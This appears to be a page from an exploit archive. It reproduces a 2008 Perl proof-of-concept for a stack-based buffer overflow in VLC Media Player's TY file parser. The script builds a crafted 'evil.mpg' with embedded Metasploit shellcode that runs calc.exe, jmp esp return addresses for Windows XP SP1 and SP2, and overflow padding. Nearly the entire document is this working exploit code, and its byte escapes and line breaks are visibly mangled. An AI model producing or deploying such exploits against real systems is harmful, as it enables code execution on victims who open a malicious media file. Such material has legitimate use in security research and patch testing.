Home / exploits vlc-overflow.txt
Posted on 21 October 2008
#!/usr/bin/perl # 10/21/2008 k`sOSe use warnings; use strict; # windows/exec - 141 bytes # http://www.metasploit.com my $shellcode = "xfcxe8x44x00x00x00x8bx45x3cx8bx7cx05x78x01" . "xefx8bx4fx18x8bx5fx20x01xebx49x8bx34x8bx01" . "xeex31xc0x99xacx84xc0x74x07xc1xcax0dx01xc2" . "xebxf4x3bx54x24x04x75xe5x8bx5fx24x01xebx66" . "x8bx0cx4bx8bx5fx1cx01xebx8bx1cx8bx01xebx89" . "x5cx24x04xc3x5fx31xf6x60x56x64x8bx46x30x8b" . "x40x0cx8bx70x1cxadx8bx68x08x89xf8x83xc0x6a" . "x50x68xf0x8ax04x5fx68x98xfex8ax0ex57xffxe7" . "x43x3ax5cx57x49x4ex44x4fx57x53x5cx73x79x73" . "x74x65x6dx33x32x5cx63x61x6cx63x2ex65x78x65" . "x00"; usage() if(!defined(@ARGV) or scalar(@ARGV) < 1 or $ARGV[0] !~ /^d$/ or $ARGV[0] > 1); my @targets = ( "x24x11x62x77", # jmp esp @ shell32.dll - Win XP SP1 "xb3x57x04x7d" # jmp esp @ shell32.dll - Win XP SP2 ); my $junk = "x41"; open(my $file, "> evil.mpg"); print $file "xF5x46x7AxBD" . # TIVO_PES_FILEID "x00x00x00x02" . "x00x02x00x00" . # CHUNK_SIZE $junk x 8 . "x00x00x05x41" . # i_map_size $junk x 4 . "x00x00x05x49" . # SEQ table size / (i_map_size + 8) == 1 $junk x 60 . $targets[$ARGV[0]] . $shellcode . $junk x 130835 . "x05" . # i_num_recs $junk x 3 . "x05" . # p_hdrs $junk x 1 . "x09" . # subrec_type \n# (subrec type & 0x0f) << 8 | rec_type == 0x9c0 -> AC-3 Audio (DTivo) "xc0" . # rec_type / $junk x 14 . "x06" . # subrec_type \n# (subrec type & 0x0f) << 8 | rec_type == 0x6e0 -> Series 1 Tivo "xe0" . # rec_type / $junk x 531062; sub usage { print <<EOM; VLC Media Player TY File Stack Based Buffer Overflow Exploit k`sOSe - 10/21/2008 usage: $0 <target> targets: 0 - Windows XP SP1 1 - Windows XP SP2 EOM exit; }
